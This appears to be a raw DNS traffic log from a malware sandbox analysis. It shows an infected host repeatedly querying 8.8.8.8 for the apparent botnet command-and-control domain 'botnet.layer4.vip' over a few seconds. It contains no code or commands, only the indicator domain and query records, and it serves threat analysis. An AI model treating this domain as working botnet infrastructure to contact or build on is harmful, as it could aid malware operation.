                                  Apr 9, 2023 03:31:06.923769951 CEST192.168.2.238.8.8.80x1660Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:06.940294027 CEST192.168.2.238.8.8.80x4d8Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:06.956264973 CEST192.168.2.238.8.8.80x4d8Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:06.972572088 CEST192.168.2.238.8.8.80x4d8Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:06.988184929 CEST192.168.2.238.8.8.80x4d8Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:07.012947083 CEST192.168.2.238.8.8.80x4d8Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:07.029391050 CEST192.168.2.238.8.8.80x77edStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:07.053518057 CEST192.168.2.238.8.8.80x77edStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:07.069351912 CEST192.168.2.238.8.8.80x77edStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:07.093410969 CEST192.168.2.238.8.8.80x77edStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:07.109266996 CEST192.168.2.238.8.8.80x77edStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:07.124838114 CEST192.168.2.238.8.8.80xa2c7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:07.148952007 CEST192.168.2.238.8.8.80xa2c7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:07.164875031 CEST192.168.2.238.8.8.80xa2c7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:07.180769920 CEST192.168.2.238.8.8.80xa2c7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:07.196352959 CEST192.168.2.238.8.8.80xa2c7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:07.212050915 CEST192.168.2.238.8.8.80x889bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:07.227993011 CEST192.168.2.238.8.8.80x889bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:07.252093077 CEST192.168.2.238.8.8.80x889bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:07.276599884 CEST192.168.2.238.8.8.80x889bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:07.301069975 CEST192.168.2.238.8.8.80x889bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:07.317195892 CEST192.168.2.238.8.8.80xd2b7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:07.341519117 CEST192.168.2.238.8.8.80xd2b7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:07.365531921 CEST192.168.2.238.8.8.80xd2b7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:07.381397963 CEST192.168.2.238.8.8.80xd2b7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:07.396950006 CEST192.168.2.238.8.8.80xd2b7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:07.421381950 CEST192.168.2.238.8.8.80xe4e1Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:07.436892033 CEST192.168.2.238.8.8.80xe4e1Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:07.452337027 CEST192.168.2.238.8.8.80xe4e1Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:07.468008041 CEST192.168.2.238.8.8.80xe4e1Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:07.483951092 CEST192.168.2.238.8.8.80xe4e1Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:07.499504089 CEST192.168.2.238.8.8.80xa6a3Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:07.515338898 CEST192.168.2.238.8.8.80xa6a3Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:07.531136036 CEST192.168.2.238.8.8.80xa6a3Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:07.555529118 CEST192.168.2.238.8.8.80xa6a3Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:07.571274042 CEST192.168.2.238.8.8.80xa6a3Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:07.587260008 CEST192.168.2.238.8.8.80xc40cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:07.603490114 CEST192.168.2.238.8.8.80xc40cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:07.627428055 CEST192.168.2.238.8.8.80xc40cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:07.642977953 CEST192.168.2.238.8.8.80xc40cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:07.658452034 CEST192.168.2.238.8.8.80xc40cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:07.674817085 CEST192.168.2.238.8.8.80xfc87Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:07.710535049 CEST192.168.2.238.8.8.80xfc87Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:07.727524996 CEST192.168.2.238.8.8.80xfc87Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:07.753020048 CEST192.168.2.238.8.8.80xfc87Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:07.778410912 CEST192.168.2.238.8.8.80xfc87Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:07.795403957 CEST192.168.2.238.8.8.80x1b12Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:07.820749998 CEST192.168.2.238.8.8.80x1b12Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:07.844914913 CEST192.168.2.238.8.8.80x1b12Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:07.860534906 CEST192.168.2.238.8.8.80x1b12Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:07.876530886 CEST192.168.2.238.8.8.80x1b12Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:07.900774956 CEST192.168.2.238.8.8.80x56dbStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:07.925169945 CEST192.168.2.238.8.8.80x56dbStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:07.940723896 CEST192.168.2.238.8.8.80x56dbStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:07.956502914 CEST192.168.2.238.8.8.80x56dbStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:07.980724096 CEST192.168.2.238.8.8.80x56dbStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:08.005304098 CEST192.168.2.238.8.8.80xd650Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:08.029695988 CEST192.168.2.238.8.8.80xd650Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:08.045583963 CEST192.168.2.238.8.8.80xd650Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:08.069813013 CEST192.168.2.238.8.8.80xd650Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:08.086214066 CEST192.168.2.238.8.8.80xd650Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:08.110924006 CEST192.168.2.238.8.8.80x196cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:08.126597881 CEST192.168.2.238.8.8.80x196cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:08.150975943 CEST192.168.2.238.8.8.80x196cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:08.166568041 CEST192.168.2.238.8.8.80x196cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:08.191015959 CEST192.168.2.238.8.8.80x196cStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:08.215287924 CEST192.168.2.238.8.8.80x6219Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:08.239357948 CEST192.168.2.238.8.8.80x6219Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:08.255335093 CEST192.168.2.238.8.8.80x6219Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:08.270915031 CEST192.168.2.238.8.8.80x6219Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:08.295026064 CEST192.168.2.238.8.8.80x6219Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:08.319252014 CEST192.168.2.238.8.8.80xc86aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:08.334969044 CEST192.168.2.238.8.8.80xc86aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:08.350980997 CEST192.168.2.238.8.8.80xc86aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:08.366955996 CEST192.168.2.238.8.8.80xc86aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:08.382940054 CEST192.168.2.238.8.8.80xc86aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:08.398818970 CEST192.168.2.238.8.8.80xfc2dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:08.422988892 CEST192.168.2.238.8.8.80xfc2dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:08.447654009 CEST192.168.2.238.8.8.80xfc2dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:08.471991062 CEST192.168.2.238.8.8.80xfc2dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:08.487876892 CEST192.168.2.238.8.8.80xfc2dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:08.503788948 CEST192.168.2.238.8.8.80xc79Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:08.528397083 CEST192.168.2.238.8.8.80xc79Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:08.544255972 CEST192.168.2.238.8.8.80xc79Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:08.569159985 CEST192.168.2.238.8.8.80xc79Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:08.585149050 CEST192.168.2.238.8.8.80xc79Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:08.609175920 CEST192.168.2.238.8.8.80x32c4Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:08.633243084 CEST192.168.2.238.8.8.80x32c4Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:08.648921013 CEST192.168.2.238.8.8.80x32c4Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:08.664582014 CEST192.168.2.238.8.8.80x32c4Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:08.688755989 CEST192.168.2.238.8.8.80x32c4Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:08.713427067 CEST192.168.2.238.8.8.80x2b65Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:08.737654924 CEST192.168.2.238.8.8.80x2b65Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:08.753578901 CEST192.168.2.238.8.8.80x2b65Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:08.778068066 CEST192.168.2.238.8.8.80x2b65Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:08.802104950 CEST192.168.2.238.8.8.80x2b65Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:08.826816082 CEST192.168.2.238.8.8.80xb907Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:08.851437092 CEST192.168.2.238.8.8.80xb907Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:08.876301050 CEST192.168.2.238.8.8.80xb907Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:08.900702953 CEST192.168.2.238.8.8.80xb907Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:08.925394058 CEST192.168.2.238.8.8.80xb907Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:08.951265097 CEST192.168.2.238.8.8.80xc452Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:08.976938009 CEST192.168.2.238.8.8.80xc452Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:08.993268013 CEST192.168.2.238.8.8.80xc452Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:09.010425091 CEST192.168.2.238.8.8.80xc452Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:09.034984112 CEST192.168.2.238.8.8.80xc452Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:09.050586939 CEST192.168.2.238.8.8.80x8525Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:09.067020893 CEST192.168.2.238.8.8.80x8525Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:09.083048105 CEST192.168.2.238.8.8.80x8525Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:09.098493099 CEST192.168.2.238.8.8.80x8525Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:09.122924089 CEST192.168.2.238.8.8.80x8525Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:09.138885975 CEST192.168.2.238.8.8.80x89bfStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:09.154438972 CEST192.168.2.238.8.8.80x89bfStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:09.179173946 CEST192.168.2.238.8.8.80x89bfStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:09.203553915 CEST192.168.2.238.8.8.80x89bfStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:09.264267921 CEST192.168.2.238.8.8.80x89bfStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:09.280021906 CEST192.168.2.238.8.8.80x3b5dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:09.295685053 CEST192.168.2.238.8.8.80x3b5dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:09.320230007 CEST192.168.2.238.8.8.80x3b5dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:09.345060110 CEST192.168.2.238.8.8.80x3b5dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:09.360940933 CEST192.168.2.238.8.8.80x3b5dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:09.376518011 CEST192.168.2.238.8.8.80xea41Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:09.392591000 CEST192.168.2.238.8.8.80xea41Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:09.408073902 CEST192.168.2.238.8.8.80xea41Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:09.432055950 CEST192.168.2.238.8.8.80xea41Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:09.456643105 CEST192.168.2.238.8.8.80xea41Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:09.472659111 CEST192.168.2.238.8.8.80xb543Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:09.496840954 CEST192.168.2.238.8.8.80xb543Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:09.512717962 CEST192.168.2.238.8.8.80xb543Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:09.536696911 CEST192.168.2.238.8.8.80xb543Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:09.560883999 CEST192.168.2.238.8.8.80xb543Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:09.585411072 CEST192.168.2.238.8.8.80x6dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:09.609915972 CEST192.168.2.238.8.8.80x6dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:09.634036064 CEST192.168.2.238.8.8.80x6dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:09.658119917 CEST192.168.2.238.8.8.80x6dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:09.682430029 CEST192.168.2.238.8.8.80x6dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:09.709758997 CEST192.168.2.238.8.8.80xee3Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:09.725290060 CEST192.168.2.238.8.8.80xee3Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:09.740719080 CEST192.168.2.238.8.8.80xee3Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:09.765028000 CEST192.168.2.238.8.8.80xee3Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:09.789146900 CEST192.168.2.238.8.8.80xee3Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:09.804560900 CEST192.168.2.238.8.8.80x755bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:09.828993082 CEST192.168.2.238.8.8.80x755bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:09.844372034 CEST192.168.2.238.8.8.80x755bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:09.868796110 CEST192.168.2.238.8.8.80x755bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:09.884448051 CEST192.168.2.238.8.8.80x755bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:09.908961058 CEST192.168.2.238.8.8.80x55a4Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:09.924431086 CEST192.168.2.238.8.8.80x55a4Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:09.940231085 CEST192.168.2.238.8.8.80x55a4Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:09.964608908 CEST192.168.2.238.8.8.80x55a4Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:09.989135981 CEST192.168.2.238.8.8.80x55a4Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:10.013463020 CEST192.168.2.238.8.8.80xc7b3Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:10.029001951 CEST192.168.2.238.8.8.80xc7b3Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:10.053400993 CEST192.168.2.238.8.8.80xc7b3Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:10.068912029 CEST192.168.2.238.8.8.80xc7b3Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:10.084861994 CEST192.168.2.238.8.8.80xc7b3Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:10.108989954 CEST192.168.2.238.8.8.80xa85bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:10.133080006 CEST192.168.2.238.8.8.80xa85bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:10.148688078 CEST192.168.2.238.8.8.80xa85bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:10.172770977 CEST192.168.2.238.8.8.80xa85bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:10.188338995 CEST192.168.2.238.8.8.80xa85bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:10.203850031 CEST192.168.2.238.8.8.80xf1fbStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:10.219691038 CEST192.168.2.238.8.8.80xf1fbStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:10.235163927 CEST192.168.2.238.8.8.80xf1fbStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:10.250946999 CEST192.168.2.238.8.8.80xf1fbStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:10.266741037 CEST192.168.2.238.8.8.80xf1fbStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:10.282574892 CEST192.168.2.238.8.8.80x7feStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:10.298147917 CEST192.168.2.238.8.8.80x7feStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:10.322489023 CEST192.168.2.238.8.8.80x7feStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:10.346548080 CEST192.168.2.238.8.8.80x7feStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:10.362413883 CEST192.168.2.238.8.8.80x7feStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:10.386603117 CEST192.168.2.238.8.8.80x952dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:10.402362108 CEST192.168.2.238.8.8.80x952dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:10.426765919 CEST192.168.2.238.8.8.80x952dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:10.451162100 CEST192.168.2.238.8.8.80x952dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:10.466766119 CEST192.168.2.238.8.8.80x952dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:10.491460085 CEST192.168.2.238.8.8.80x8d33Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:10.515798092 CEST192.168.2.238.8.8.80x8d33Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:10.531709909 CEST192.168.2.238.8.8.80x8d33Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:10.547638893 CEST192.168.2.238.8.8.80x8d33Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:10.571707964 CEST192.168.2.238.8.8.80x8d33Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:10.596173048 CEST192.168.2.238.8.8.80x7025Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:10.612221956 CEST192.168.2.238.8.8.80x7025Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:10.636378050 CEST192.168.2.238.8.8.80x7025Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:10.660763979 CEST192.168.2.238.8.8.80x7025Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:10.685013056 CEST192.168.2.238.8.8.80x7025Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:10.710268974 CEST192.168.2.238.8.8.80x2060Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:10.726006031 CEST192.168.2.238.8.8.80x2060Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:10.741666079 CEST192.168.2.238.8.8.80x2060Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:10.766436100 CEST192.168.2.238.8.8.80x2060Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:10.791119099 CEST192.168.2.238.8.8.80x2060Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:10.815510988 CEST192.168.2.238.8.8.80xf79aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:10.831449986 CEST192.168.2.238.8.8.80xf79aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:10.849859953 CEST192.168.2.238.8.8.80xf79aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:10.865684986 CEST192.168.2.238.8.8.80xf79aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:10.889785051 CEST192.168.2.238.8.8.80xf79aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:10.914344072 CEST192.168.2.238.8.8.80xc30fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:10.930078983 CEST192.168.2.238.8.8.80xc30fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
